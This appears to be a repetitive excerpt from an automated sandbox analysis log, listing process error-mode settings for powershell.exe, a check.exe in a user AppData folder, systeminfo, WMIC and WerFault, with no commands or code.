Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
